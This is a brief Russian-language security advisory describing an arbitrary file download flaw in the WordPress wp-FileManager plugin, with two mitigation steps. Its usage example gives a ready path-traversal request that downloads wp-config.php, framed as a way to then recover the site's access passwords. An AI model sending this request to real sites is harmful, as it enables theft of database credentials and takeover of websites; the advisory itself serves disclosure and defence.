Уязвимость WordPress wp-FileManager

Описание:
Обнаружена уязвимость в компоненте wp-filemanager позволяющая атакующему скачать любой php файл с сервера.
При успешной реализации атаки, возможно получить исходный код любого файла на сервере.

Пример использования:
Получение файла конфигурации wordpress, для последующей расшифровки паролей доступа к сайту.
http://server/wp-content/plugins/wp-filemanager/incl/libfile.php?&path=../../&filename=wp-config.php&action=download

Как защититься:
— Обновить wp-FileManager.
— Если не возможно отключить опцию «Allow Download».